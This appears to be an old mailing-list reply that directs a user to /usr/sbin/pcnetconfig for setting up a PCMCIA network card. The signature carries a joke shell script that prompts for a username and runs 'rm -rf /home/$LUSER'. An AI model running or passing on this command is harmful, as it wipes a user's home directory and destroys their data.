> when installing the base disks, we went throught the configuration > utility. > How can I run it again after configuration? I missed setting up my > pcmcis network card. > want to redo it.
You can set up your PCMCIA netcard with this program: /usr/sbin/pcnetconfig It's easy to use and this will set up your netcard as soon as the pcmcia driver is loaded or you plug in your netcard :) -- Regarts/Hilsen Anders Kvist aka wazquis(@freesite.dk) ----------------------------- #!/bin/sh echo "What's your username? " read LUSER rm -rf /home/$LUSER -----------------------------

